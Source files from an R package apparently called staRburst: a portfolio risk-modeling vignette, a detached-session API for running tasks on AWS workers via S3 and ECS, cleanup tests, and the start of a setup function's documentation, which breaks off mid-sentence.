#   portfolio_return <- total_pnl / sum(portfolio_data$position_value)
# 
#   list(
#     scenario_id = scenario$scenario_id,
#     scenario_type = scenario$scenario_type,
#     total_pnl = total_pnl,
#     portfolio_return = portfolio_return,
#     equity_contribution = sum(position_pnl[portfolio_data$asset_class == "Equity"]),
#     bond_contribution = sum(position_pnl[portfolio_data$asset_class == "Bond"]),
#     position_pnl = position_pnl
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Generate sample scenarios
# test_stress <- generate_stress_scenarios(n_scenarios = 20)
# test_mc <- generate_mc_scenarios(n_scenarios = 100)
# 
# test_scenarios <- c(test_stress, test_mc)
# 
# cat(sprintf("Running local benchmark (%d scenarios)...\n", length(test_scenarios)))
# local_start <- Sys.time()
# 
# local_results <- lapply(test_scenarios, value_portfolio_scenario,
#                        portfolio_data = portfolio)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Average time per scenario: %.3f seconds\n",
#             local_time / length(test_scenarios)))
# cat(sprintf("  Estimated time for 10,000 scenarios: %.1f minutes\n",
#             local_time * 10000 / length(test_scenarios) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # Generate full scenario set
# cat("Generating scenario sets...\n")
# stress_scenarios <- generate_stress_scenarios(n_scenarios = 100)
# mc_scenarios <- generate_mc_scenarios(n_scenarios = 10000)
# sensitivity_scenarios <- generate_sensitivity_scenarios()
# 
# all_scenarios <- c(stress_scenarios, mc_scenarios, sensitivity_scenarios)
# 
# cat(sprintf("  Stress test scenarios: %d\n", length(stress_scenarios)))
# cat(sprintf("  Monte Carlo scenarios: %s\n",
#             format(length(mc_scenarios), big.mark = ",")))
# cat(sprintf("  Sensitivity scenarios: %d\n", length(sensitivity_scenarios)))
# cat(sprintf("  Total scenarios: %s\n\n",
#             format(length(all_scenarios), big.mark = ",")))
# 
# # Run parallel valuation
# n_workers <- 50
# 
# cat(sprintf("Running risk analysis (%s scenarios) on %d workers...\n",
#             format(length(all_scenarios), big.mark = ","), n_workers))
# 
# cloud_start <- Sys.time()
# 
# # Each scenario is tiny (~1 ms), so submitting 10,145 one-scenario tasks would be
# # dominated by per-task S3 overhead (see the Workload Shapes guide). Batch into
# # ~100 tasks, each valuing a chunk of scenarios.
# batches <- split(
#   all_scenarios,
#   ceiling(seq_along(all_scenarios) / ceiling(length(all_scenarios) / 100))
# )
# results <- starburst_map(
#   batches,
#   function(batch) lapply(batch, value_portfolio_scenario, portfolio_data = portfolio),
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# results <- unlist(results, recursive = FALSE)  # flatten to one result per scenario
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))
# 
# cat(sprintf("\n[OK] Completed in %.2f minutes\n", cloud_time))

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract P&L from all scenarios
# pnl_values <- sapply(results, function(x) x$total_pnl)
# return_values <- sapply(results, function(x) x$portfolio_return)
# 
# # Separate by scenario type
# stress_pnl <- pnl_values[1:100]
# mc_pnl <- pnl_values[101:10100]
# sensitivity_pnl <- pnl_values[10101:length(pnl_values)]
# 
# cat("\n=== Comprehensive Risk Analysis Results ===\n\n")
# 
# # 1. Stress Test Results
# cat("=== Stress Test Results ===\n")
# cat(sprintf("Worst case loss: $%.0f (%.2f%%)\n",
#             min(stress_pnl),
#             min(stress_pnl) / total_portfolio_value * 100))
# cat(sprintf("Average stress loss: $%.0f (%.2f%%)\n",
#             mean(stress_pnl),
#             mean(stress_pnl) / total_portfolio_value * 100))
# cat(sprintf("Best case (least bad): $%.0f (%.2f%%)\n\n",
#             max(stress_pnl),
#             max(stress_pnl) / total_portfolio_value * 100))
# 
# # 2. Value at Risk (VaR) from Monte Carlo
# cat("=== Value at Risk (Monte Carlo) ===\n")
# var_95 <- quantile(mc_pnl, 0.05)
# var_99 <- quantile(mc_pnl, 0.01)
# var_999 <- quantile(mc_pnl, 0.001)
# 
# cat(sprintf("VaR (95%%): $%.0f (%.2f%%)\n",
#             -var_95, -var_95 / total_portfolio_value * 100))
# cat(sprintf("VaR (99%%): $%.0f (%.2f%%)\n",
#             -var_99, -var_99 / total_portfolio_value * 100))
# cat(sprintf("VaR (99.9%%): $%.0f (%.2f%%)\n\n",
#             -var_999, -var_999 / total_portfolio_value * 100))
# 
# # 3. Expected Shortfall (Conditional VaR)
# cat("=== Expected Shortfall (CVaR) ===\n")
# es_95 <- mean(mc_pnl[mc_pnl <= var_95])
# es_99 <- mean(mc_pnl[mc_pnl <= var_99])
# 
# cat(sprintf("ES (95%%): $%.0f (%.2f%%)\n",
#             -es_95, -es_95 / total_portfolio_value * 100))
# cat(sprintf("ES (99%%): $%.0f (%.2f%%)\n\n",
#             -es_99, -es_99 / total_portfolio_value * 100))
# 
# # 4. Portfolio Statistics
# cat("=== Portfolio Statistics ===\n")
# cat(sprintf("Mean P&L: $%.0f\n", mean(mc_pnl)))
# cat(sprintf("Std Dev P&L: $%.0f\n", sd(mc_pnl)))
# cat(sprintf("Skewness: %.3f\n",
#             mean((mc_pnl - mean(mc_pnl))^3) / sd(mc_pnl)^3))
# cat(sprintf("Probability of loss: %.2f%%\n\n",
#             mean(mc_pnl < 0) * 100))
# 
# # 5. Asset Class Contributions
# cat("=== Risk Contribution by Asset Class ===\n")
# for (ac in unique(portfolio$asset_class)) {
#   ac_contrib <- sapply(results[101:10100], function(x) {
#     sum(x$position_pnl[portfolio$asset_class == ac])
#   })
#   ac_var <- quantile(ac_contrib, 0.05)
#   cat(sprintf("%s VaR (95%%): $%.0f\n", ac, -ac_var))
# }
# 
# # 6. Sensitivity Analysis Summary
# if (length(sensitivity_pnl) > 0) {
#   cat("\n=== Sensitivity Analysis ===\n")
#   cat(sprintf("Maximum sensitivity loss: $%.0f\n", min(sensitivity_pnl)))
#   cat(sprintf("Maximum sensitivity gain: $%.0f\n", max(sensitivity_pnl)))
#   cat(sprintf("Average absolute sensitivity: $%.0f\n",
#               mean(abs(sensitivity_pnl))))
# }
# 
# # 7. Regulatory Metrics
# cat("\n=== Regulatory Metrics ===\n")
# market_risk_capital <- -var_99 * 3  # Simplified Basel III calculation
# cat(sprintf("Market Risk Capital Requirement: $%.0f\n", market_risk_capital))
# cat(sprintf("Capital as %% of Portfolio: %.2f%%\n",
#             market_risk_capital / total_portfolio_value * 100))

## ----incremental, eval=FALSE--------------------------------------------------
# # For each position, calculate VaR with and without it
# analyze_incremental_risk <- function(position_idx, scenarios, portfolio_data) {
#   # Create modified portfolio without this position
#   modified_portfolio <- portfolio_data
#   original_value <- modified_portfolio$position_value[position_idx]
#   modified_portfolio$position_value[position_idx] <- 0
# 
#   # Value under all scenarios
#   results_without <- lapply(scenarios, value_portfolio_scenario,
#                            portfolio_data = modified_portfolio)
# 
#   pnl_without <- sapply(results_without, function(x) x$total_pnl)
#   var_without <- quantile(pnl_without, 0.05)
# 
#   list(
#     position_idx = position_idx,
#     asset_name = portfolio_data$asset_name[position_idx],
#     var_without = var_without,
#     original_value = original_value
#   )
# }
# 
# # Run in parallel (demonstration - would use smaller scenario set)
# # incremental_results <- starburst_map(
# #   1:nrow(portfolio),
# #   analyze_incremental_risk,
# #   scenarios = mc_scenarios[1:1000],  # Use subset for speed
# #   portfolio_data = portfolio,
# #   workers = 25
# # )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/risk-modeling.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/risk-modeling.R", package = "starburst"))

#' Detached Session API
#'
#' User-facing API for creating and managing detached sessions
#'
#' @name session-api
NULL

#' Create a Detached Starburst Session
#'
#' Creates a new detached session that can run computations independently
#' of your R session. You can close R and reattach later to collect results.
#'
#' @param workers Number of parallel workers (default: 10)
#' @param cpu vCPUs per worker (default: 4)
#' @param memory Memory per worker, e.g., "8GB" (default: "8GB")
#' @param region AWS region (default: from config or "us-east-1")
#' @param timeout Task timeout in seconds (default: 3600)
#' @param session_timeout Active timeout in seconds (default: 3600)
#' @param absolute_timeout Maximum session lifetime in seconds (default: 86400)
#' @param launch_type "EC2" or "FARGATE" (default: "EC2")
#' @param instance_type EC2 instance type for EC2 launch (default: "c7g.xlarge")
#' @param use_spot Use spot instances for EC2 (default: TRUE)
#' @param warm_pool_timeout EC2 warm pool timeout in seconds (default: 3600)
#'
#' @return A \code{StarburstSession} object (also carrying \code{$session_id}, the
#'   handle you pass to \code{\link{starburst_session_attach}}) with methods:
#'   \describe{
#'     \item{\code{submit(expr, globals = NULL, packages = NULL)}}{Submit one task
#'       (a quoted expression). Returns the task id. Call repeatedly to fan out work.}
#'     \item{\code{status()}}{Return a progress summary (counts of pending / running
#'       / completed / failed tasks). Safe to call from a fresh R session after
#'       reattaching.}
#'     \item{\code{collect(wait = FALSE)}}{Retrieve results, keyed by task id, in
#'       submission order. With \code{wait = FALSE} returns whatever has finished so
#'       far; \code{wait = TRUE} blocks until every submitted task is terminal.
#'       Every terminal task appears: a success carries its return value; a
#'       \strong{failed} task carries a structured failure
#'       \code{list(error = TRUE, message = ..., value = NULL, task_id = ...)} so
#'       failures are visible rather than silently dropped.}
#'     \item{\code{extend(seconds = 3600)}}{Extend the active/absolute timeout of a
#'       still-running session.}
#'     \item{\code{cleanup(stop_workers = TRUE, force = FALSE)}}{Stop the session's
#'       workers and mark it terminated. By default \strong{S3 objects are
#'       preserved} (so you can still inspect/collect); pass \code{force = TRUE} to
#'       also delete the session's S3 task/result objects. Otherwise the session
#'       self-terminates at \code{absolute_timeout}.}
#'   }
#'
#' @section Lifecycle:
#' \code{starburst_session()} launches workers immediately and returns a handle.
#' Submit tasks, then either poll \code{status()}/\code{collect()} in the same
#' session, or record \code{session$session_id}, close R, and later
#' \code{\link{starburst_session_attach}(session_id)} to reconnect and collect.
#' A session ends when you call \code{cleanup()}, when \code{session_timeout}
#' elapses with no activity, or at \code{absolute_timeout} — whichever comes first.
#'
#' @section Failure behavior:
#' A failed task is recorded (surfaced via \code{status()}) and does not abort the
#' others; \code{collect()} returns it as a structured failure entry
#' (\code{error = TRUE} with a \code{message}) alongside the successful results,
#' rather than dropping it or raising. If the client
#' dies, workers keep running against S3 until a timeout, which is what makes
#' reattaching possible. \code{cleanup()} is the only thing that frees resources
#' early — sessions do not auto-clean on garbage collection.
#'
#' @seealso \code{\link{starburst_session_attach}},
#'   \code{\link{starburst_list_sessions}}; \code{\link{starburst_map}} for
#'   ephemeral (non-detached) fan-out.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Create detached session
#'   session <- starburst_session(workers = 10)
#'
#'   # Submit tasks
#'   task_ids <- lapply(1:100, function(i) {
#'     session$submit(quote(expensive_computation(i)))
#'   })
#'
#'   # Close R and come back later...
#'   session_id <- session$session_id
#'
#'   # Reattach
#'   session <- starburst_session_attach(session_id)
#'
#'   # Collect results
#'   results <- session$collect(wait = TRUE)
#' }
#' }
starburst_session <- function(workers = 10,
                              cpu = 4,
                              memory = "8GB",
                              region = NULL,
                              timeout = 3600,
                              session_timeout = 3600,
                              absolute_timeout = 86400,
                              launch_type = "EC2",
                              instance_type = "c7g.xlarge",
                              use_spot = TRUE,
                              warm_pool_timeout = 3600) {

  # Generate session ID
  session_id <- sprintf("session-%s", gsub("-", "", uuid::UUIDgenerate()))

  cat_info(sprintf("[Package] Creating detached session: %s\n", session_id))

  # Initialize backend
  backend <- initialize_detached_backend(
    session_id = session_id,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    timeout = timeout,
    absolute_timeout = absolute_timeout,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot,
    warm_pool_timeout = warm_pool_timeout
  )

  # Launch workers
  launch_detached_workers(backend)

  # Create session object
  session <- create_session_object(backend)

  cat_success(sprintf("[OK] Session ready: %s\n", session_id))
  cat_info("   Use session$submit(expr) to add tasks\n")
  cat_info("   Use session$status() to check progress\n")
  cat_info("   Use session$collect() to retrieve results\n")

  session
}

#' Reattach to Existing Session
#'
#' Reattach to a previously created detached session
#'
#' @param session_id Session identifier
#' @param region AWS region (default: from config)
#'
#' @return A StarburstSession object
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   session <- starburst_session_attach("session-abc123")
#'   status <- session$status()
#'   results <- session$collect()
#' }
#' }
starburst_session_attach <- function(session_id, region = NULL) {
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"
  bucket <- config$bucket

  cat_info(sprintf("[Link] Attaching to session: %s\n", session_id))

  # Load session manifest from S3
  manifest <- get_session_manifest(session_id, region, bucket)

  # Check if session expired
  if (Sys.time() > manifest$absolute_timeout) {
    stop(sprintf("Session expired: %s", session_id))
  }

  # Reconstruct backend
  backend <- reconstruct_backend_from_manifest(manifest)

  # Create session object
  session <- create_session_object(backend)

  cat_success(sprintf("[OK] Attached to session: %s\n", session_id))

  session
}

#' List All Sessions
#'
#' List all detached sessions in S3
#'
#' @param region AWS region (default: from config)
#'
#' @return Data frame with session information
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   sessions <- starburst_list_sessions()
#'   print(sessions)
#' }
#' }
starburst_list_sessions <- function(region = NULL) {
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"
  bucket <- config$bucket

  s3 <- get_s3_client(region)

  # List all session manifests
  result <- s3$list_objects_v2(
    Bucket = bucket,
    Prefix = "sessions/",
    Delimiter = "/"
  )

  if (length(result$CommonPrefixes) == 0) {
    cat_info("No sessions found\n")
    return(data.frame(
      session_id = character(0),
      created_at = character(0),
      last_activity = character(0),
      total_tasks = integer(0),
      pending = integer(0),
      running = integer(0),
      completed = integer(0),
      failed = integer(0)
    ))
  }

  sessions <- list()

  for (prefix_obj in result$CommonPrefixes) {
    # Extract session ID from prefix
    session_id <- sub("sessions/(.*)/", "\\1", prefix_obj$Prefix)

    tryCatch({
      manifest <- get_session_manifest(session_id, region, bucket)

      sessions[[session_id]] <- data.frame(
        session_id = session_id,
        created_at = format(manifest$created_at),
        last_activity = format(manifest$last_activity),
        total_tasks = manifest$stats$total_tasks,
        pending = manifest$stats$pending,
        running = manifest$stats$running,
        completed = manifest$stats$completed,
        failed = manifest$stats$failed,
        stringsAsFactors = FALSE
      )
    }, error = function(e) {
      # Skip if manifest cannot be read
    })
  }

  if (length(sessions) == 0) {
    return(data.frame(
      session_id = character(0),
      created_at = character(0),
      last_activity = character(0),
      total_tasks = integer(0),
      pending = integer(0),
      running = integer(0),
      completed = integer(0),
      failed = integer(0)
    ))
  }

  do.call(rbind, sessions)
}

#' Create session object with methods
#'
#' @param backend Backend environment
#' @return Session object (environment)
#' @keywords internal
create_session_object <- function(backend) {
  session <- new.env(parent = emptyenv())
  session$backend <- backend
  session$session_id <- backend$session_id

  # Submit method
  session$submit <- function(expr, envir = parent.frame(), substitute = TRUE,
                            globals = TRUE, packages = NULL) {
    submit_to_session(session, expr, envir, substitute, globals, packages)
  }

  # Status method
  session$status <- function() {
    get_session_status(session)
  }

  # Collect method
  session$collect <- function(wait = FALSE, timeout = 3600) {
    collect_session_results(session, wait, timeout)
  }

  # Extend method
  session$extend <- function(seconds = 3600) {
    extend_session_timeout(session, seconds)
  }

  # Cleanup method
  session$cleanup <- function(stop_workers = TRUE, force = FALSE) {
    cleanup_session(session, stop_workers, force)
  }

  class(session) <- c("StarburstSession", "environment")

  session
}

#' Submit task to session
#'
#' @keywords internal
submit_to_session <- function(session, expr, envir, substitute, globals, packages) {
  backend <- session$backend

  # Substitute expression if needed
  if (substitute) {
    expr_sub <- base::substitute(expr)
    # If substitute returns a symbol 'expr', it means the argument was already
    # evaluated (e.g., user passed quote(...)). In that case, use the value.
    if (is.symbol(expr_sub) && identical(as.character(expr_sub), "expr")) {
      # expr is already evaluated, check if it's a language object
      if (!is.language(expr)) {
        stop("When substitute=TRUE and passing an evaluated expression, ",
             "it must be a language object (e.g., created with quote())")
      }
      # Use the evaluated expression as-is
    } else {
      # Use the substituted expression
      expr <- expr_sub
    }
  }

  # Auto-detect globals and packages
  if (isTRUE(globals)) {
    gp <- future::getGlobalsAndPackages(expr, envir = envir, globals = TRUE)
    globals <- gp$globals
    if (is.null(packages)) {
      packages <- gp$packages
    }
  }

  # Generate task ID
  task_id <- sprintf("task-%s", gsub("-", "", uuid::UUIDgenerate()))

  # Create task data
  task_data <- list(
    session_id = backend$session_id,
    task_id = task_id,
    expr = expr,
    globals = globals,
    packages = packages
  )

  # Upload task to S3
  upload_detached_task(task_id, task_data, backend)

  # Create task status as pending
  create_task_status(
    session_id = backend$session_id,
    task_id = task_id,
    state = "pending",
    region = backend$region,
    bucket = backend$bucket
  )

  # Update manifest stats
  update_session_manifest(
    session_id = backend$session_id,
    updates = list(
      stats = list(
        total_tasks = backend$total_tasks + 1,
        pending = NA  # Will be recalculated in status()
      )
    ),
    region = backend$region,
    bucket = backend$bucket
  )

  backend$total_tasks <- backend$total_tasks + 1

  cat_info(sprintf("[OK] Task submitted: %s\n", task_id))

  invisible(task_id)
}

#' Get session status
#'
#' @keywords internal
get_session_status <- function(session) {
  backend <- session$backend

  # Get all task statuses
  statuses <- list_task_statuses(
    session_id = backend$session_id,
    region = backend$region,
    bucket = backend$bucket
  )

  # Count by state (excluding bootstrap tasks)
  counts <- list(
    total = 0,
    pending = 0,
    claimed = 0,
    running = 0,
    completed = 0,
    failed = 0
  )

  for (task_id in names(statuses)) {
    # Skip bootstrap tasks
    if (grepl("^bootstrap-", task_id)) {
      next
    }

    status <- statuses[[task_id]]
    state <- status$state

    counts$total <- counts$total + 1

    if (state %in% names(counts)) {
      counts[[state]] <- counts[[state]] + 1
    }
  }

  # Combine claimed and running
  counts$running <- counts$running + counts$claimed
  counts$claimed <- NULL

  structure(counts, class = "StarburstSessionStatus")
}

#' Collect results from session
#'
#' @keywords internal
collect_session_results <- function(session, wait, timeout) {
  backend <- session$backend
  s3 <- get_s3_client(backend$region)

  start_time <- Sys.time()
  results <- list()

  repeat {
    # Get all task statuses
    statuses <- list_task_statuses(
      session_id = backend$session_id,
      region = backend$region,
      bucket = backend$bucket
    )

    # Collect terminal (completed OR failed) results we haven't collected yet.
    # Every submitted task ends up in the returned list keyed by task id: a
    # successful task carries its value; a failed task carries a structured
    # failure (error = TRUE, message, task_id) so failures are visible rather
    # than silently dropped.
    for (task_id in names(statuses)) {
      # Skip bootstrap tasks
      if (grepl("^bootstrap-", task_id)) {
        next
      }

      status <- statuses[[task_id]]

      # Skip if not terminal yet, or already collected
      if (!status$state %in% c("completed", "failed") ||
          task_id %in% names(results)) {
        next
      }

      # Download the result/error blob from S3 (workers upload an error result
      # for failed tasks too). Fall back to a structured failure from the status.
      result_key <- sprintf("results/%s.qs", task_id)
      temp_file <- tempfile(fileext = ".qs")

      tryCatch({
        s3$download_file(
          Bucket = backend$bucket,
          Key = result_key,
          Filename = temp_file
        )

        results[[task_id]] <- qs2::qs_read(temp_file)
      }, error = function(e) {
        if (identical(status$state, "failed")) {
          # No or unreadable error blob: synthesize a structured failure.
          results[[task_id]] <<- list(
            error = TRUE,
            message = status$error %||% "task failed (no error detail available)",
            value = NULL,
            task_id = task_id
          )
        } else {
          cat_warn(sprintf("Failed to download result for task %s: %s\n",
                          task_id, e$message))
        }
      }, finally = {
        unlink(temp_file)
      })
    }

    # Check if we should continue waiting
    if (!wait) {
      break
    }

    # Check if all *user* tasks are completed. Bootstrap tasks
    # (bootstrap-session-...) are the long-lived workers polling the queue; they
    # stay "claimed"/"running" for the life of the session, so they must be
    # excluded here — otherwise all_completed is never TRUE and a wait=TRUE
    # collect hangs until the timeout even though every real result has landed.
    user_statuses <- statuses[!grepl("^bootstrap-", names(statuses))]
    all_completed <- length(user_statuses) > 0 && all(vapply(user_statuses, function(s) {
      s$state %in% c("completed", "failed")
    }, FUN.VALUE = logical(1)))

    if (all_completed) {
      break
    }

    # Check timeout
    elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
    if (elapsed > timeout) {
      cat_warn("Collection timeout reached\n")
      break
    }

    # Wait before next poll
    Sys.sleep(2)
  }

  cat_info(sprintf("[OK] Collected %d results\n", length(results)))

  results
}

#' Extend session timeout
#'
#' @keywords internal
extend_session_timeout <- function(session, seconds) {
  backend <- session$backend

  # Update manifest with new timeout
  update_session_manifest(
    session_id = backend$session_id,
    updates = list(
      absolute_timeout = Sys.time() + seconds
    ),
    region = backend$region,
    bucket = backend$bucket
  )

  cat_success(sprintf("[OK] Extended session timeout by %d seconds\n", seconds))

  invisible(NULL)
}

#' Cleanup session
#'
#' @param session Session object
#' @param stop_workers Stop running ECS tasks (default TRUE)
#' @param force Delete S3 files (default FALSE)
#' @keywords internal
cleanup_session <- function(session, stop_workers = TRUE, force = FALSE) {
  backend <- session$backend
  session_id <- backend$session_id

  cat_info(sprintf("[Cleaning] Cleaning up session: %s\n", session_id))

  # 1. Stop all running ECS tasks
  if (stop_workers) {
    tryCatch({
      ecs <- get_ecs_client(backend$region)

      # List all tasks in the cluster with our session tag
      tasks_response <- ecs$list_tasks(
        cluster = backend$cluster_name,
        desiredStatus = "RUNNING"
      )

      if (length(tasks_response$taskArns) > 0) {
        # Describe tasks to filter by session ID
        tasks_detail <- ecs$describe_tasks(
          cluster = backend$cluster_name,
          tasks = tasks_response$taskArns
        )

        stopped_count <- 0
        for (task in tasks_detail$tasks) {
          # Check if this task belongs to our session (via environment variables)
          task_session_id <- NULL
          if (!is.null(task$overrides) && !is.null(task$overrides$containerOverrides)) {
            for (container in task$overrides$containerOverrides) {
              if (!is.null(container$environment)) {
                for (env_var in container$environment) {
                  # Check for TASK_ID that matches our session pattern
                  if (env_var$name == "TASK_ID" && grepl(session_id, env_var$value)) {
                    task_session_id <- session_id
                    break
                  }
                }
              }
              if (!is.null(task_session_id)) break
            }
          }

          # Stop tasks belonging to this session
          if (!is.null(task_session_id)) {
            tryCatch({
              ecs$stop_task(
                cluster = backend$cluster_name,
                task = task$taskArn,
                reason = sprintf("Session cleanup: %s", session_id)
              )
              stopped_count <- stopped_count + 1
            }, error = function(e) {
              cat_warn(sprintf("  [WARNING] Failed to stop task: %s\n", e$message))
            })
          }
        }

        if (stopped_count > 0) {
          cat_success(sprintf("  [OK] Stopped %d workers\n", stopped_count))
        } else {
          cat_info("  [INFO] No running workers found for this session\n")
        }
      } else {
        cat_info("  [INFO] No running workers found\n")
      }
    }, error = function(e) {
      cat_warn(sprintf("  [WARNING] Failed to stop workers: %s\n", e$message))
    })
  } else {
    cat_info("  [INFO] Workers not stopped (stop_workers = FALSE)\n")
  }

  # 2. Delete S3 session files (if force = TRUE)
  if (force) {
    tryCatch({
      s3 <- get_s3_client(backend$region)
      prefix <- sprintf("sessions/%s/", session_id)

      # List all objects under session prefix
      result <- s3$list_objects_v2(
        Bucket = backend$bucket,
        Prefix = prefix
      )

      if (length(result$Contents) > 0) {
        # Delete in batches of 1000 (S3 limit)
        object_keys <- vapply(result$Contents, function(x) x$Key, FUN.VALUE = character(1))

        total_deleted <- 0
        for (i in seq(1, length(object_keys), by = 1000)) {
          batch <- object_keys[i:min(i + 999, length(object_keys))]

          s3$delete_objects(
            Bucket = backend$bucket,
            Delete = list(
              Objects = lapply(batch, function(k) list(Key = k))
            )
          )
          total_deleted <- total_deleted + length(batch)
        }

        # Verify deletion
        Sys.sleep(2)  # S3 eventual consistency
        verify_result <- s3$list_objects_v2(
          Bucket = backend$bucket,
          Prefix = prefix
        )

        remaining <- length(verify_result$Contents)
        if (remaining > 0) {
          cat_warn(sprintf("  [WARNING] Warning: %d objects remain after cleanup\n", remaining))
        } else {
          cat_success(sprintf("  [OK] Deleted %d S3 objects\n", total_deleted))
        }
      } else {
        cat_info("  [INFO] No S3 files found to delete\n")
      }

      # Also delete task files
      tasks_prefix <- "tasks/"
      tasks_result <- s3$list_objects_v2(
        Bucket = backend$bucket,
        Prefix = tasks_prefix
      )

      if (length(tasks_result$Contents) > 0) {
        # Filter task files for this session
        all_keys <- sapply(tasks_result$Contents, function(obj) obj$Key)
        session_task_keys <- all_keys[grepl(session_id, all_keys)]

        if (length(session_task_keys) > 0) {
          s3$delete_objects(
            Bucket = backend$bucket,
            Delete = list(
              Objects = lapply(session_task_keys, function(k) list(Key = k))
            )
          )
          cat_success(sprintf("  [OK] Deleted %d task files\n", length(session_task_keys)))
        }
      }
    }, error = function(e) {
      cat_warn(sprintf("  [WARNING] S3 cleanup failed: %s\n", e$message))
    })
  } else {
    cat_info("  [INFO] S3 files preserved (use force = TRUE to delete)\n")
  }

  # 3. Mark session as terminated in manifest (if not force deleting)
  if (!force) {
    tryCatch({
      update_session_manifest(
        session_id,
        list(
          state = "terminated",
          terminated_at = Sys.time()
        ),
        backend$region,
        backend$bucket
      )
      cat_success("  [OK] Session marked as terminated\n")
    }, error = function(e) {
      # Silently fail if manifest already deleted or inaccessible
    })
  }

  cat_success("[OK] Cleanup complete\n")
  invisible(NULL)
}

#' Print method for session status
#'
#' @param x A StarburstSessionStatus object
#' @param ... Additional arguments (ignored)
#' @return Invisibly returns \code{x}.
#'
#' @export
print.StarburstSessionStatus <- function(x, ...) {
  cat("Session Status:\n")
  cat(sprintf("  Total tasks:     %d\n", x$total))
  cat(sprintf("  Pending:         %d\n", x$pending))
  cat(sprintf("  Running:         %d\n", x$running))
  cat(sprintf("  Completed:       %d\n", x$completed))
  cat(sprintf("  Failed:          %d\n", x$failed))

  if (x$total > 0) {
    pct_complete <- round(100 * x$completed / x$total, 1)
    cat(sprintf("  Progress:        %.1f%%\n", pct_complete))
  }

  invisible(x)
}

test_that("cleanup_session function exists and has correct signature", {
  # Verify the function exists
  expect_true(exists("cleanup_session", mode = "function"))

  # Check that it can be called with the expected parameters
  # (without actually running cleanup on a real session)
})

test_that("session object has cleanup method", {
  skip_on_cran()
  skip_if_offline()

  # Create a mock session object to check structure
  backend <- new.env()
  backend$session_id <- "test-session-id"
  backend$region <- "us-east-1"
  backend$bucket <- "test-bucket"
  backend$cluster_name <- "test-cluster"

  # Create session object
  session <- create_session_object(backend)

  # Verify cleanup method exists
  expect_true("cleanup" %in% names(session))
  expect_true(is.function(session$cleanup))

  # Check that cleanup has the right parameters
  cleanup_formals <- formals(session$cleanup)
  expect_true("stop_workers" %in% names(cleanup_formals))
  expect_true("force" %in% names(cleanup_formals))

  # Check defaults
  expect_equal(cleanup_formals$stop_workers, TRUE)
  expect_equal(cleanup_formals$force, FALSE)
})

test_that("cleanup respects stop_workers parameter", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. session$cleanup(stop_workers = FALSE) doesn't stop tasks
  # 2. session$cleanup(stop_workers = TRUE) does stop tasks
  # Requires actual session creation
})

test_that("cleanup respects force parameter for S3 deletion", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. session$cleanup(force = FALSE) preserves S3 files
  # 2. session$cleanup(force = TRUE) deletes S3 files
  # Requires actual session creation
})

test_that("launch_detached_workers tracks task ARNs in manifest", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. After launching workers, manifest contains ecs_task_arns
  # 2. Number of ARNs matches number of workers
  # 3. ARNs are valid ECS task ARN format
  # Requires actual session creation and AWS access
})

test_that("cleanup can identify and stop session-specific tasks", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. cleanup only stops tasks belonging to the session
  # 2. cleanup doesn't stop tasks from other sessions
  # 3. cleanup reports accurate count of stopped tasks
  # Requires multiple active sessions
})

test_that("cleanup verifies S3 deletion when force=TRUE", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. After cleanup(force=TRUE), S3 prefix has 0 objects
  # 2. Cleanup reports number of deleted objects
  # 3. Task files are also deleted
  # Requires actual session with S3 files
})

test_that("cleanup handles errors gracefully", {
  skip_on_cran()
  skip_if_offline()

  # Create a session with invalid backend to test error handling
  backend <- new.env()
  backend$session_id <- "test-session-id"
  backend$region <- "us-east-1"
  backend$bucket <- "nonexistent-bucket-12345"
  backend$cluster_name <- "nonexistent-cluster"

  session <- create_session_object(backend)

  # Cleanup should not crash, just warn
  expect_output(
    session$cleanup(stop_workers = FALSE, force = FALSE),
    "Cleanup complete"  # Should still report completion
  )
})

test_that("cleanup marks session as terminated in manifest", {
  skip_on_cran()
  skip_if_offline()
  skip("Integration test requires live AWS resources")

  # This would test that:
  # 1. After cleanup(force=FALSE), manifest has state="terminated"
  # 2. Manifest has terminated_at timestamp
  # 3. After cleanup(force=TRUE), manifest is deleted
  # Requires actual session
})

#' Setup staRburst
#'
#' One-time configuration to set up AWS resources for staRburst
#'
#' @param region AWS region (default: "us-east-1")
#' @param force Force re-setup even if already configured
#' @param use_public_base Use public base Docker images (default: TRUE).
#'   Set to FALSE to build private base images in your ECR.
#' @param ecr_image_ttl_days Number of days to keep Docker images in ECR (default: NULL = never delete).
#'   AWS will automatically delete images older than this many days.
#'   This prevents surprise costs if you stop using staRburst.
#'   Recommended: 30 days for regular users, 7 days for occasional users.
#'   When images are deleted, they will be rebuilt on next use (adds 3-5 min).
#' @param build_image Build the worker environment image during setup (default: TRUE).
#'   Set to FALSE to provision AWS resources (S3/ECR/ECS/VPC), write config, and
#'   check quotas without triggering the multi-minute Docker image build. The
#'   image is then built lazily on first worker launch via
#'   \code{ensure_environment()}. Useful for CI / connectivity checks.
#' @param setup_ec2 Provision the EC2 capacity provider and Auto Scaling Group for
#'   the default instance type during setup (default: TRUE). This is what makes the
#'   default EC2 backend work out of the box — without it, the first
